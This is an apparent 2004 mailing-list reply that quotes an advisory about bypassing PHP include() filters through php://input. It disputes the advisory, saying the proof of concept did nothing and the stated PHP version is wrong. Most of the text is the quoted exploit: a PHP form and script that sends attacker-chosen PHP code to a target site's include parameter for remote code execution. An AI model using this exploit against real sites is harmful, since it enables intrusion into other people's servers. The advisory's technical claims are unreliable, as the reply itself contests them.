What exactly does your "proof of concept" do? I tried this on my system with PHP 4.34.x--which, by the way, is when support for php://input began, *not* 3.0.13--and nothing happened whatsoever. Where's the proof? on 5/27/04 3:07 AM, lostnoobs@xxxxxxxxxxxxxxxxxxxxxx purportedly said: > > > Informations : > °°°°°°°°°°°°°° > Website : http://www.php.net > Version : PHP 3.0.13 => > Problem : Inlude() bypassing filter > > > Proof of concept: > °°°°°°°° Exploit °°°°°°°°° > <------------ cut here ----------------> > <form action="" methode="post" > > target server : <input type="text" name="server" ><br> > file : <input type="text" name="file" ><br> > exec : <input type="text" name="cmd" ><br> > <INPUT type="submit" value="send"> > </form> > > <? > if($cmd){ > $message = "POST /".$file."php://input HTTP/1.1\r\n"; > $message .= "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, > application/x-shockwave-flash, */*\r\n"; > $message .= "Accept-Language: fr\r\n"; > $message .= "Content-Type: application/x-www-form-urlencoded\r\n"; > $message .= "Accept-Encoding: deflate\r\n"; > $message .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; > MyIE2)\r\n"; > $message .= "Host: ".$server."\r\n"; > $message .= "Content-length: ".strlen( $cmd )."\r\n"; > $message .= "Connection: Keep-Alive\r\n"; > $message .= "Cache-Control: no-cache\r\n"; > $message .= "\r\n"; > $message .= $cmd."\r\n"; > $fd = fsockopen( $server, 80 ); > fputs($fd,$message); > while(!feof($fd)) { > echo fgets($fd,1280); > } > fclose($fd); > } > ?> > <------------ cut here ----------------> > > target server = "www.exemple.com" > file = "index.php?page=" > exec = "<? phpinfo(); ?>" > > Explaination > °°°°°°°°°°°°°° > You can bypassing filter protection who parse http:// or ftp:// ... > "php://input" allows to put data in the function include() by sending a > request with code php in POST methode. > > > For More details : > °°°°°°°°°°°°°° > http://fr2.php.net/manual/en/wrappers.php.php > irc.fr.worldnet.net #s-c > > Nourredine Himeur > > www.security-challenge.com > > This vulnerability was found by Slythers but he's too shy for publish the vuln > ;) > > greetz : mum , daddy , tcpteam , Nyx > > > Keary Suska Esoteritech, Inc. "Leveraging Open Source for a better Internet"
